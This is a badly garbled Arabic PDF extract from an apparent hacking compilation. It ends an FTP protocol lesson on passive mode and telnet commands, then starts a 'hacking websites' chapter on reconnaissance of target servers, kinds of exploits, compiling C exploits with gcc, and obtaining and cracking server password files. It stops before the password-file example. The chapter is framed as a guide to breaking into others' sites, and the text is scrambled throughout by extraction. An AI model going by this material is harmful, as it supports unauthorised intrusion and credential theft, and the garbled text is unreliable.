‫ﻗﻢﻓﻲﺑﺪاﯾﺔﻛ ﻞ ﺳﻄ ﺮ ‪..‬‬ ‫ﻗﻊ ﻵ ﺧ ﺮ ‪..‬إﻻﻓﻲاﻟ ﺮ‬ ‫ﺘﻠ ﻒ ﻣﻦ ﻣﻮ‬ ‫ﺘﺠﺎﺑﻪﻗﺪﺗﺨ‬ ‫ﻮﺑﺎﻟﻄﺒﻊﺗﻠﻚاﻹﺳ‬
‫ﺄﻧ ﺖاﻵنﻗﺪﻗﻤ ﺖﺑﺎﻟﻮﻟﻮجإﻟﻰاﻟﺨﺎدمﺑﻨﺠﺎ ح ‪.‬‬
‫ﺘﻘﺒﺎ لاﻟﺒﯿﺎﻧﺎ ت(ﻗﺎﺋﻤﻪﺑﺎﻟﻤﻠﻔﺎ تاﻟﻤﻮﺟﻮدةأو‬‫ﺑﻌﺪأنﺗﻤ ﺖ ﻋﻤﻠﯿﻪاﻟﻮﻟﻮجﻟﻠﻨﻈﺎم ﯾﺠﺐإﻧﺸﺎ ء وﺻﻠﻪ ﻹرﺳﺎ ل واﺳ‬
‫اﻟﻤﻠﻔﺎ ت ذاﺗﻬﺎ( ‪..‬إذن ﻣﺎاﻟﺬيﻛﻨﺎ ﻧﻔﻌﻠﻪ ﻣﻨﺬﻗﻠﯿ ﻞ ؟!! ﻣﺎﻗﺪﻓﻌﻠﻨﺎه ﻣﻨﺬﻗﻠﯿ ﻞ ﻫﻮإﻧﺸﺎ ء و ﺻﻠﻪ ﻹرﺳﺎ لاﻷواﻣ ﺮ‬
‫ﺘﺠﺎﺑﺔ ﺎﻟﻨﻈﺎم ﻋﻠﻰاﻷواﻣ ﺮ ‪.‬‬ ‫ﺘﻘﺒﺎ لاﺳ‬‫ﻟﻠﻨﻈﺎم واﺳ‬
‫ﺘﯿﻦ‬ ‫ﻮﻟﻜﻲ ﻧﻨﺸﺊﺗﻠﻚاﻟﻮ ﺻﻠﺔ ‪،‬ﻫﻨﺎك ﻃ ﺮﯾﻘ‬
‫ﺘﻮ حاﻟﺬي‬ ‫ﻗﻢ ‪ IP‬ﺎﻟﺨﺎ صﺑﻪ واﻟﻤﻨﻔﺬاﻟﻤﻔ‬ ‫ﺎﻷوﻟﻲ ‪:‬ﺗﻨﺸﺊ ﻫﺬهاﻟﻄ ﺮﯾﻘﺔاﻟﻮﺻﻠﺔﺑﺎن ﯾ ﺮﺳ ﻞاﻟﺰﺑﻮن )أﻧ ﺖ( ر‬
‫ﺘﺨﺪاﻣﻪﻓﻲإرﺳﺎ لاﻟﺒﯿﺎﻧﺎ ت ‪.‬‬ ‫ﺘﻄﯿﻊاﻟﺨﺎدماﺳ‬ ‫ﯾﺴ‬
‫ﺘﺢ ﻫﺬااﻟﻤﻨﻔﺬ‬ ‫ﺘﻄﻠﺐﺑ ﺮﻧﺎﻣ ﺞ ﺧﺎ صﻟﻔ‬ ‫ﺘﺢﺄ ﺣﺪاﻟﻤﻨﺎﻓﺬ ﻋﻠﻰ ﺟﻬﺎزك و ﻫﺬا ﺳﯿ‬ ‫ﺘﻄﻠﺐ ﻣﻨﻚﻓ‬ ‫ﻮﻟﻜﻦﺗﻠﻚاﻟﻄ ﺮﯾﻘﺔﺗ‬
‫ﺘﺨﺪمﺗﻠﻚاﻟﻄ ﺮﯾﻘﺔ ‪.‬‬ ‫‪ ..‬وﻟﺬﻟﻚﻟﻦ ﻧﺴ‬
‫ﺎﻟﺜﺎﻧﯿﺔ ‪:‬ﺗﻨﺸﺊ ﻫﺬهاﻟﻄ ﺮﯾﻘﺔاﻟﻮﺻﻠﺔﺑﺎن ﯾ ﺮﺳ ﻞاﻟﺰﺑﻮناﻷﻣ ﺮ ‪PASV‬‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬
‫‪PASV‬‬
‫ﺘﻄﯿﻊاﻟﺰﺑﻮن )أﻧ ﺖ(‬ ‫ﺘﻮ ح )ﻋﻠﻰاﻟﺨﺎدمﺑﺎﻟﻄﺒﻊ(اﻟﺬي ﯾﺴ‬ ‫ﻗﻢ ‪ IP‬ﺎﻟﺨﺎ صﺑﻪ واﻟﻤﻨﻔﺬاﻟﻤﻔ‬ ‫ﻮ ﺳﯿ ﺮداﻟﺨﺎدمﺑ ﺮ‬
‫ﺎﻻﺗﺼﺎ ل ﻋﻠﯿﻪ ‪..‬‬
‫ﻣﺜﺎ ل‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬
‫)‪227 Entering Passive Mode (207,189,69,61,12,41‬‬

‫ﺘﺎﻟﻲ ‪..‬‬ ‫ﻗﻮاسﺗﻔﺴﯿ ﺮهﻛﺎﻟ‬ ‫ﻗﻢاﻟﻄﻮﯾ ﻞاﻟﻤﻮﺟﻮدﺑﯿﻦ ﺎﻷ‬ ‫ﻮاﻟ ﺮ‬


‫ﺄو لأرﺑﻊ ﻣﺠﻤﻮﻋﺎ ت )ﻣﻦاﻟﯿﺴﺎر(ﻫﻮا ل ‪ IP‬ﺎﻟﺨﺎ صﺑﺎﻟﺨﺎدم وﻓﻲﻫﺬهاﻟ ﺤﺎﻟﺔ ﯾﻜﻮن ‪.. ٢٠٧،١٨٩،٦٩،٦١‬‬
‫ﺘﺎﻟﻲ‬
‫ﺘﻢ ﺣﺴﺎﺑﻪﻛﺎﻟ‬ ‫ﻗﻢ ﺎﻟﻤﻨﻔﺬ و ﯾ‬‫ﺘﺎﻟﯿﺎنﻓﯿﻤﺜﻼن ر‬ ‫ﻗﻤﺎناﻟ‬
‫أﻣﺎاﻟ ﺮ‬
‫‪12 × 256 + 41 = 3113‬‬
‫ﺘﺢ و ﺻﻠﻪ ﺟﺪﯾﺪه ﻣﻊاﻟﺨﺎدم ﻋﻠﻰاﻟﻤﻨﻔﺬ ‪٣١١٣‬‬ ‫ﺘﻲ ﯾﺠﺐ ﻋﻠﻰاﻟﺰﺑﻮناﺗﺒﺎﻋﻬﺎﻫﻲﻓ‬ ‫ﺘﺎﻟﯿﺔاﻟ‬
‫ﻮﻟﺬﻟﻚﻓﺎﻟﺨﻄﻮةاﻟ‬
‫ﺘﺢ ﻧﺎﻓﺬة ‪ Telnet‬ﺟﺪﯾﺪه وﺗﺸﺒﻚ ﻋﻠﻰ ‪ftp.zdnet.com‬‬ ‫ﺘﻮﺟﺐ ﻋﻠﯿﻚﻓ‬ ‫‪..‬ﻮﻟﻜﻲﺗﻘﻮمﺑﻤﺜ ﻞ ﻫﺬااﻷﻣ ﺮ ﯾ‬
‫ﺑﺎﻟﻤﻨﻔﺬ ‪.. ٣١١٣‬‬
‫ﺘﻈﻬ ﺮﺑﻬﺎاﻟﺒﯿﺎﻧﺎ ت ‪..‬‬
‫ﺘ ﺮﺳﻠﻪ ﻣﻦ ﺎﻟﻨﺎﻓﺬةاﻷوﻟﻰ واﻟﻨﺎﻓﺬةاﻟﺜﺎﻧﯿﺔ ﺳ‬ ‫ﺈذن ﻋﻨﺪﻣﺎﺗ ﺮﯾﺪأنﺗ ﺮﺳ ﻞأ ﺣﺪاﻷواﻣ ﺮ ﺳ‬
‫ﻣﺜﺎ ل‬
‫ﺘﻮﯾﺎ تاﻟﺪﻟﯿ ﻞ(ﻓﻲاﻟﻨﺎﻓﺬةاﻷوﻟﻰ‬ ‫ﺘﺨﺪمﻟﻌ ﺮ ض ﻣ ﺤ‬ ‫ﻋﻨﺪﻣﺎﺗ ﺮﺳ ﻞ ﺎﻷﻣ ﺮ) ‪ LIST‬ﯾﺴ‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬

‫‪١ ٤٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪LIST‬‬
‫ﺘﺎﻟﻲﻓﻲاﻟﻨﺎﻓﺬةاﻷوﻟﻰﺄﯾ ﻀﺎ‬‫ﺘﺠﯿﺐاﻟﺨﺎدمﺑﺎﻟ‬
‫ﺳﯿﺴ‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬

‫‪125 Data connection already open; Transfer starting.‬‬

‫ﺘﻢ ﻏﻠ ﻖاﻻﺗﺼﺎ لﻓﻲاﻟﻨﺎﻓﺬةاﻟﺜﺎﻧﯿﺔﺑﻤﺠ ﺮدإﺗﻤﺎم ﻋ ﺮ ض‬


‫ﺘﻮﯾﺎ تاﻟﺪﻟﯿ ﻞﻓﻲاﻟﻨﺎﻓﺬةاﻟﺜﺎﻧﯿﺔﺛﻢ ﺳﯿ‬ ‫ﺘﻈﻬ ﺮ ﻣ ﺤ‬‫ﻮﺳ‬
‫ﺘﻮﯾﺎ تاﻟﺪﻟﯿ ﻞ ‪.‬‬
‫ﻣﺤ‬

‫ﺘﻘﺒﺎ لأوإرﺳﺎ ل ﻣﻠ ﻒ ﻣﺎ ‪ ،‬ﯾﺠﺐﺄنﺗﺒﺪأﺑﺄﻣ ﺮ‬‫ﺘﻮﯾﺎ ت دﻟﯿ ﻞ ﻣﺎأواﺳ‬


‫ﻮﻫﻜﺬاﻛﻠﻤﺎأرد تأنﺗ ﺮﺳ ﻞأﻣ ﺮ ﻋ ﺮ ض ﻣ ﺤ‬
‫ﻗﻢاﻟﻤﻨﻔﺬﺑﺎﺗﺒﺎ عاﻟﺨﻄﻮا ت ﺎﻟﺴﺎﺑﻘﺔ ‪.‬‬‫‪PASV ..‬ﺛﻢﺗﻨﺸﺊاﺗﺼﺎﻻ ﺟﺪﯾﺪاﺑﻌﺪ ﺣﺴﺎب ر‬

‫ﺘﻊ‬
‫ﺘﻜﻢﺑﻬﺬااﻟﻤﻮ ﺿﻮ عاﻟﻤﻤ‬
‫ﺘﻄﻊأناﻣﻨﻊ ﻧﻔﺴﻲ ﻣﻦ ﻣﺸﺎرﻛ‬
‫ﺈﻟﻰ ﻫﻨﺎ وأﻇﻦأﻧﻨﻲﻗﺪﺗﻤﺎدﯾ ﺖ ‪ ..‬وﻟﻜﻨﻨﻲﻟﻢاﺳ‬
‫ﺘﻊﺑﺎﻟﻨﺴﺒﺔإﻟﻲ( ‪.‬‬
‫)ﻣﻤ‬

‫ﻣﻼ ﺣﻈﺎ ت ﻫﺎﻣﺔ‬


‫ﺘﺨﺪمﺑ ﺮﻧﺎﻣ ﺞ ﺟﺎﻫﺰ ﻣﺜ ﻞ ‪ CuteFTP‬؟!!‬ ‫ﺘﻄﯿﻊﺑﺪﻻ ﻣﻦﻛ ﻞﻫﺬااﻟﻬ ﺮا ءأناﺳ‬ ‫ﺘﺴﺎ ء لاﻵن ‪..‬أﻻأﺳ‬ ‫‪-‬ﻟ ﺮﺑﻤﺎﺗ‬
‫ﺘﺨﺪﻣﻪ ﻮ رﺑﻤﺎﺑﻌﺪﺗﻌﻠﻢاﻟﺒ ﺮوﺗﻮﻛﻮ ل‬ ‫ﺘﻄﯿﻊ وﻟﻜﻦﻟﻦ ﯾ ﻀ ﺮكأنﺗﻌﻠﻢ ﺷﯿﺌﺎ ﻋﻦاﻟﺒ ﺮوﺗﻮﻛﻮ لاﻟﺬيﺗﺴ‬ ‫ﺑﺎﻟﻄﺒﻊﺗﺴ‬
‫ﺘﻄﯿﻊأنﺗﺼﻨﻊﺑ ﺮﻧﺎﻣﺠﻚاﻟﺨﺎ ص‬ ‫ﺗﺴ‬
‫ﺘﻮﻋﺐاﻟﻔﻜ ﺮةﺗﻤﺎﻣﺎﺛﻢاﺳﺄ لﻓﯿﻤﺎ ﺷﺌ ﺖ‬ ‫ﺘﻰﺗﺴ‬‫ﻗ ﺮأاﻟﺪرس ﻣ ﺮه و ﻣﺮﺗﯿﻦ ﺣ‬ ‫‪-‬ﺎ‬
‫ﺘﺎﻟﯿﺔ‬‫ﻗﻊاﻟ‬‫ﺘﻌﻠﻢاﻛﺜ ﺮ ﻋﻦ ﻫﺬااﻟﻤﻮ ﺿﻮ عﻗﻢﺑﺰﯾﺎرةاﻟﻤﻮا‬ ‫‪-‬ﻟ‬
‫‪http://www.vbip.com/winsock/winsock_ftp_01.asp‬‬
‫)ﯾﻨﺼﺢﺑﻪﺑﺸﺪه(‬
‫‪) http://www.vbip.com/winsock/winsock_ftp_ref_01.htm‬ﯾﻨﺼﺢﺑﻪﺑﺸﺪه(‬
‫ﺘﻌﻤ ﻖﻓﻲ‬ ‫‪) http://www .cis.ohio-state.edu/htbin/rfc/rfc0959.html‬ﻟﻤﻦاراد ﺎﻟ‬
‫اﻟﺒ ﺮوﺗﻮﻛﻮ ل(‪....‬‬

‫‪١ ٤٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﺧﱰاق اﳌﻮاﻗﻊ )اﳉﺰء اﻟﺜﺎﻧﻲ( "‬

‫‪$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﻜﻨﺪور‬
‫‪$$$$$$$$$$‬‬

‫ﺘ ﺮا ق ‪:‬‬
‫اﻹ ﺧ‬
‫~~~~~~~~~‬
‫‪-‬ﺎﻟﻤﻘﺪﻣﺔ ‪.‬‬
‫ﻗﻊ ؟‬‫‪-‬ﻛﯿ ﻒأﺟﻤﻊ ﻣﻌﻠﻮﻣﺎ ت ﺣﻮ لاﻟﻤﻮ‬
‫ﺘﻢﻛﺸ ﻒ ﻧﻘﺎطاﻟ ﻀﻌ ﻒ ؟‬ ‫‪-‬ﻛﯿ ﻒ ﯾ‬
‫ﺘﺸﻔﻪ ؟‬ ‫ﺘﻐﻼ ل ﻧﻘﺎطاﻟ ﻀﻌ ﻒاﻟﻤﻜ‬ ‫‪-‬ﻛﯿ ﻒ ﯾﻤﻜﻦإﺳ‬
‫‪-‬ﻣﺎﻫﻮ ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ‪ password file‬؟‬
‫‪-‬ﺑﻤﺎذا ﯾﻔﯿﺪﻧﻲ ﻫﺬااﻟﻤﻠ ﻒ ؟‬
‫‪-‬ﻛﯿ ﻒ ﯾﻤﻜﻦ ﻣﻌ ﺮﻓﺔﻛﻠﻤﺔاﻟﺴ ﺮ ﻣﻦ ﺧﻼ ل ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد ‪ password file‬؟‬
‫‪-‬ﻣﺎاﻟﻔ ﺮ قﺑﯿﻦﺈذاﻛﺎناﻟﻤﻠ ﻒ )ﻣﺸﻔ ﺮ )‪ encryption‬ﻮإذاﻛﺎن )ﻣ ﻀﻠ ﻞ )‪ shadowed‬؟‬
‫ﺘﻢﻛ ﺴ ﺮه ؟‬
‫‪-‬ﻮﻣﺎذاﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺸﻔ ﺮ ‪،‬ﻛﯿ ﻒ ﯾ‬
‫‪-‬ﻮﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣ ﻀﻠ ﻞ ‪ ،‬ﻣﺎذا ﻋﻠﻲانأﻋﻤ ﻞ ؟‬
‫><><><><><><><><><><><><><><><><><><><><><><><><><><><><><‬

‫ﻛﯿﻔﯿﺔ ﺟﻤﻊاﻟﻤﻌﻠﻮﻣﺎ تﻗﺪﺗﻘﺪماﻟﻜﻼم ﻋﻨﻬﺎ ‪.....‬‬


‫~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫‪-‬‬
‫ﺘﻢﻛﺸ ﻒ ﻧﻘﺎطاﻟ ﻀﻌ ﻒ ؟‬ ‫ﻛﯿ ﻒ ﯾ‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﺘ ﺮﻓﯿﻦ‬‫ﺘﺨﺪمﺑ ﺮاﻣ ﺞ ﻣﺜ ﻞ ‪void eye‬ﺄو ‪ShadowSecurityScaner‬ﻫﺬهﻟﻠﻤﻐﻔﻠﯿﻦﻓﻘﻂ!!‪،‬اﻟﻤ ﺤ‬ ‫ﻻﺗﺴ‬
‫ﺘﺮ ق ‪،‬‬‫ﺘ ﺮ قﻟﻤﺠ ﺮدأﻧﻪ ﯾﺒﻐﺎ ﯾﺨ‬
‫ﺘ ﺮا ق ‪ ،‬وﻻ ﯾﺨ‬
‫ﺘﺨﺪمﺑ ﺮاﻣ ﺞﻓﻲ ﻋﻤﻠﯿﺎ تاﻹ ﺧ‬ ‫ﺘ ﺮ ف ﻻ ﯾﺴ‬
‫واﻟﻠﻲ ﯾﺒﻐﺎ ﯾﻜﻮن ﻣ ﺤ‬
‫ﺘﻲ‬‫ﺘﺨﻄﯿﻂاﻟﻤ ﺤﻜﻢ ‪ ،‬وﻛ ﻞ ﻋﻤﻠﯿﺎ تاﻟﺴﻄﻮاﻟﻤ ﺤﻜﻤﻪ ﻫﻲ ﺎﻟ‬ ‫ﺘﻨﺎﻫﯿﻪ ‪ ،‬واﻟ‬‫ﻗﻪاﻟﻤ‬‫ﺘﺎزﺑﺎﻟﺪ‬
‫ﺘ ﺮا ق ﺳﯿ ﺮﻓ ﺮﺗﻤ‬
‫ﻋﻤﻠﯿﻪإ ﺧ‬
‫ﻗﻨﻲإﻧﻚ‬ ‫ﺘﺸﺎ ف ﻣﺮﺗﻜﺒﯿﻬﺎ ‪،‬ﻟﻜﻦ وا ﷲﻟﻮﻛﻨ ﺖ ﻣﻦاﻟﻠﻲ ﯾﺸﻐ ﻞﺑ ﺮﻧﺎﻣ ﺞ وﻣﺎﯾﺪريا ﷲ ﻮﯾﻦ ﺣﺎ ﻃﻪﻓﺼﺪ‬ ‫ﯾﺼﻌﺐإﻛ‬
‫ﺘ ﺮا قﺑﻮا ﺣﺪ ﻣﻦﻫﺬهاﻟﺒ ﺮاﻣ ﺞﻓﺴﻮ ف‬ ‫ﺘ ﺮ ق ﺷﺊ ‪،‬ﻓﻠﻮ ﺣﺪ ث وﺗﻢ ﺎﻹ ﺧ‬ ‫ﻣﺎرا حﺗﻔﻠﺢ ﻃﻮ ل ﻋﻤ ﺮك ‪،‬ﻫﺬاﻟﻮﻗﺪر تﺗﺨ‬
‫ﺗﺼﻄﺎدﺑﺴﻨﺎرهﺗﻤﺎﻣﺎﻛﺎﻟﺴﻤﻜﻪ‬

‫ﻗﻊ ﻣﺎ ‪-:‬‬
‫ﺎﻵن ﺳﻮ فأ ﺿﻊاﻟﻨﻘﺎطاﻷﺳﺎﺳﯿﻪﻟﻜﺸ ﻒ ﻧﻘﺎط ﺿﻌ ﻒ ﻋﻠﻰ ﻣﻮ‬

‫ﺘﻌ ﺮ ف ﻋﻠﻰﻛﺎﻓﻪاﻟﺨﺪﻣﺎ تاﻟﻤﻮﺟﻮده ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ‪.‬‬ ‫‪-١‬اﻟ‬


‫ﺘﺸﻐﯿ ﻞ وإﺻﺪارﺗﻪ وﻛﺬﻟﻚ ﻣﻠﻘﻢاﻟﻮﯾﺐ وأيﺑ ﺮﻣﺠﯿﺎ تأ ﺧ ﺮى ﻣﺜ ﻞ ﻣﻔﺴ ﺮ ﻧﺼﻮ صﺑﯿ ﺮ لإذا‬ ‫‪ -٢‬ﻣﻌ ﺮﻓﻪ ﻧﻈﺎماﻟ‬
‫ﻛﺎنﺬﻟﻚ ﻣﻤﻜﻦ ‪،‬أوﺑ ﺮﻧﺎﻣ ﺞﻟﻠﺒﯿﻊ واﻟﺸ ﺮا ء ‪.....‬اﻟ ﺦ‪.‬‬
‫ﻗﻊ ‪ ،‬ﻫﺬاإذا وﺟﺪ ﺷﺊ ﻣﻨﻬﺎ‬ ‫ﺘﺎ ت ) ‪ ( Perl - Cgi‬ﺎﻟﻤﻮﺟﻮدهﻓﻲاﻟﻤﻮ‬ ‫ﺘﻘﺎطﻛ ﻞاﻟﺴﻜ ﺮﺑ‬ ‫‪ -٣‬ﻋﻤ ﻞ ﺟﻠﺴﻪ ﻹﻟ‬
‫‪ -٤‬وﻻﺗﻨﺴﻰﺗ ﺤﻂاﻟﺒﻮرﺗﺎ ت ﻣﻌﻬﺎ ‪،‬ﻷﻧﻪأ ﺣﯿﺎﻧﺎ ﯾﻜﻮنﻓﻲاﻟﺒﻮر ت ﻧﻘﻄﻪ ﺿﻌ ﻒ ‪،‬ﻟﯿ ﺲ ﻫﺬا ﺻ ﺤﯿ ﺤﺎ ‪%١٠٠‬‬
‫ﻗ ﺮبﺗﻌﺒﯿ ﺮﻟﻬﺎ(‬ ‫ﻧﻘﻄﻪاﻟ ﻀﻌ ﻒﻟﯿﺴ ﺖﻓﻲاﻟﺒﻮر تﺑﻌﯿﻨﻪ ‪،‬ﻓﻲاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻠﻲ ﻣﺼﻠﺢإﻧﺼﺎ تﻟﻠﺒﻮر ت )ﻫﺬاأ‬
‫ﺘﻲ ﺣﺼﻠ ﺖ ﻋﻠﯿﻬﺎﻓﻲاﻟﺒ ﺤﺚ ﻋﻦ ﻧﻘﺎط ﺿﻌ ﻒ )ﯾﻮﺟﺪﻓﻲ آ ﺧ ﺮ ﻫﺬا‬ ‫ﺘﻔﺎده ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ تاﻟ‬ ‫‪-٥‬أ ﺧﯿ ﺮا ﯾﻤﻜﻨﻚاﻹﺳ‬
‫ﺘﻮي ﻋﻠﻰأرﺷﯿﻔﺎ تﻗﺪﺗﻔﯿﺪكﻓﻲ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟﺜﻐ ﺮا ت(‬ ‫ﻗﻊﺗ ﺤ‬ ‫ﻗﻊ ﻣﻦ ﻇﻤﻨﻬﺎ ﻣﻮا‬ ‫ﺘﻨﺪ ﻣﻮا‬ ‫اﻟﻤﺴ‬

‫‪١ ٤٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺸﻔﻪ ؟‬ ‫ﺘﻐﻼ ل ﻧﻘﺎطاﻟ ﻀﻌ ﻒاﻟﻤﻜ‬ ‫‪-‬ﻛﯿ ﻒ ﯾﻤﻜﻦﺈﺳ‬


‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﺘﺼﻔﺢ ‪،‬‬‫ﺘﻲﺗﻨﻔﺬ ﻣﻦ ﺧﻼ ل ﺎﻟﻤ‬ ‫ﺘﺨﺪﻣﻬﺎﻫﻲﺗﻠﻚاﻟ‬ ‫ﺘﺪيأن ﯾﺴ‬ ‫ﺘﻄﯿﻊأي ﻣﺒ‬ ‫ﺘﻲ ﯾﺴ‬ ‫ﺄﺑﺴﻂاﻟﺜﻐ ﺮا ت واﻟ‬
‫ﺘﻐ ﻞﺑﻬﺎاﻟﺜﻐ ﺮه( ﯾﻜﻮن‬ ‫ﺘﻲﺗﺴ‬ ‫ﺘﺜﻤﺎر ﻋﻠﻰاﻟﻄ ﺮﯾﻘﻪ ﺎﻟ‬ ‫ﺘﺜﻤﺎر )ﻣﻦاﻵن ﺳﻮ ف ﻧﻄﻠ ﻖإﺳﻢإﺳ‬ ‫ﻧﻮ ع آ ﺧ ﺮ ‪ ،‬ﯾﻜﻮناﻹﺳ‬
‫ﺘﻮبﺑﺒ ﺮﻧﺎﻣ ﺞ ‪sh‬ﻓﻲﻟﯿﻮﻧﻜ ﺲ ‪ ،‬وﻫﻮ ﻣﺎ ﯾﺴﻤﻰﺑﺎﻟﻌ ﺮﺑﻲﺑ ﺮﻧﺎﻣ ﺞاﻟﻐﻼ ف‬ ‫ﺘﺜﻤﺎر ﻋﻠﻰ ﺷﻜ ﻞ ﺷﻔ ﺮه )ﻛﻮد( ﻣﻜ‬ ‫اﻹﺳ‬
‫ﺘﺪاد ‪ *.sh‬ﻮﺗﻌﻤ ﻞﺗ ﺤ ﺖﺑﯿﺌﻪﻟﯿﻮﻧﻜ ﺲ ‪ ،‬وﻫﺬااﻟﻨﻮ ع‬ ‫وﺑﺎﻹﻧﺠﻠﯿﺰي ‪ shell‬ﻮﺗﻜﻮنﻫﺬهاﻟﺸﻔ ﺮهﺗ ﺤ ﺖ ﻣﻠ ﻒﺑﺎﻹﻣ‬
‫ﺘﻌﺪداﻷداو تﻓﻲﻟﯿﻮﻧﻜ ﺲﻓﺈنﻟﻐﻪ ‪shell‬‬ ‫ﺘ ﺮ قﺑﺎﻟﻘﻮه وﻧﻈ ﺮاﻟ‬ ‫ﺘﺜﻤﺎرا ت ﻫﻮاﻟﻤﻔ ﻀ ﻞ وﯾ ﺤﺴ ﺲاﻟﻤﺨ‬ ‫ﻣﻦاﻹﺳ‬
‫ﺘﺎﺑﻪ ﻣﻠ ﻒ دﻓﻌﺎﺗﻲﻓﻲ وﯾﻨﺪوز )‪(bat‬‬ ‫ﺎﺻﺒ ﺤ ﺖﻗﻮﯾﻪﻓﻬﻲﺗﻘﺎﺑ ﻞﻛ‬
‫ﺘﻮبﺑﻠﻐﻪ ‪ C‬ﺎﻟﻤﺸﻬﻮره ‪ ،‬وﻫﺬااﻟﻨﻮ ع ﻏﺎﻟﺒﺎ ﻣﺎﺗ ﺤﺪ ث‬ ‫ﺘﺜﻤﺎرا تﺛﺎﻧﻲ وﻫﻮ ﺷﻔ ﺮه )ﻛﻮد( ﻣﻜ‬ ‫ﻮﯾﻮﺟﺪ ﻧﻮ ع ﻣﻦ ﺎﻹﺳ‬
‫ﺘﺎﻋﺐﻟﺬﻟﻚ ﯾﺠﺐأنﺗﻜﻮنﻟﺪﯾﻚ ﺧﻠﻔﯿﻪﻓﻲﻟﻐﻪ ﺳﻲ ‪،‬‬ ‫ﺘ ﺮﺟﻤﻪ ‪،‬ﻗﺪﺗﻮاﺟﻪﻛﺜﯿ ﺮ ﻣﻦاﻟﻤ‬ ‫ﺛﻨﺎ ء ﻋﻤﻠﯿﻪاﻟ‬ ‫ﻓﯿﻪأ ﺧﻄﺄأ‬
‫ﺘ ﺮﺟﻢ ‪gcc‬ﺑﻬﺬهاﻟﺼﯿﻐﺔ ‪..‬‬ ‫ﺘﺨﺪام ﺎﻟﻤ‬‫ﺘﻪﺑﺈﺳ‬ ‫ﺘ ﺮﺟﻤﻪ ﻫﺬااﻟﻨﻮ ع ﻋﻠﯿﻚﺑﺎﻟﺬﻫﺎباﻟﻰﻟﯿﻮﻧﻜ ﺲ وﺗ ﺮﺟﻤ‬ ‫وﻟ‬
‫‪gcc Exploit.c -o Exploit‬‬
‫ﺘ ﺮﺟﻢ‬ ‫ﺘ ﻞﻓﺴﻮ ف ﯾ‬ ‫ﺘﺪادﻟﻠﻤﻠ ﻒ ‪ *.c‬ﻮﻟﯿ ﺲ ‪*.C ،‬ﻟﻮﻛﺎن ﺣ ﺮ ف ‪c‬ﻛﺒ‬ ‫ﻣﻼ ﺣﻈﻪ ﻣﻬﻤﻪ ) ﯾﺠﺐأن ﯾﻜﻮناﻹﻣ‬
‫ﺘﺜﻤﺎرﻗﺒ ﻞ‬ ‫ﺘﻄﻠﺒﻬﺎاﻹﺳ‬ ‫ﺘﻲ ﯾ‬ ‫ﺘﺒﺎ ت )‪ (*.h‬ﺎﻟ‬ ‫ﺘﺐﻓﻲ ﺳﻲ ‪ ، ++‬ﺎﻟﺸﺊاﻟﺜﺎﻧﻲﺗﺄﻛﺪ ﻣﻦﺗﻮﻓ ﺮاﻟﻤﻜ‬ ‫ﺘﺜﻤﺎر وﻛﺄﻧﻪﻛ‬ ‫اﻹﺳ‬
‫ﺘﻨﺪا تﻓﻲاﻟﺒ ﺮﻣﺠﻪﻗﺪﺗﻨﻔﻌﻚ ‪.‬‬ ‫ﻗﻌﻲﻓﻬﻨﺎك ﻣﺴ‬ ‫ﺗﺸﻐﯿﻠﻪ( و ﻋﻠﯿﻚ زﯾﺎره ﻣﻮ‬
‫ﺘﻮﺑﻪﺑﻠﻐﻪ ‪ Perl‬ﻮﻣﻦ‬ ‫ﺘﺸ ﺮ وﻫﻮأﯾ ﻀﺎ ﺷﻔ ﺮه وﻟﻜﻦ ﻣﻜ‬ ‫ﺘﺜﻤﺎرا ت وﺑﺪا ء ﯾﻨ‬‫ﯾﻮﺟﺪ ﻧﻮ ع ﻇﻬ ﺮ ﻣﺆ ﺧ ﺮا ﻣﻦاﻹﺳ‬
‫ﺘﻢﺗﺸﻐﯿ ﻞ ﻫﺬااﻟﻨﻮ ع ﻣﻦ ﻣﻮﺟﻪاﻟﺪوسﻓﻲ وﯾﻨﺪوز )ﯾﺠﺐأنﺗﻤﻠﻚﺑ ﺮﻧﺎﻣ ﺞ ﯾﻔﺴ ﺮ ﺷﻔ ﺮا ت ﺎﻟﺒﯿ ﺮ ل‬ ‫اﻟﻤﻤﻜﻦﺄن ﯾ‬
‫ﺘﯿ ﻒﺑﯿ ﺮ ل(‬‫ﻣﺜ ﻞأﻛ‬

‫‪-‬ﻣﺎﻫﻮ ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ‪ password file‬؟‬


‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﻌ ﺮو ف ﻣﻦإﺳﻤﻪ ‪ ،‬ﻫﻮاﻟﺬيﻓﻲ دا ﺧﻠﻪﺗﻮﺟﺪ ﺣﺴﺎﺑﺎ تاﻷﺷﺨﺎ صاﻟﻤ ﺮ ﺧ ﺺﻟﻬﻢﺑﺎﻟﺪ ﺧﻮ ل‬
‫اﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ ‪ ،‬ﻣﺜ ﻞ ﻫﺬا‬

‫‪------------------------------------------------------------------------------------------------‬‬
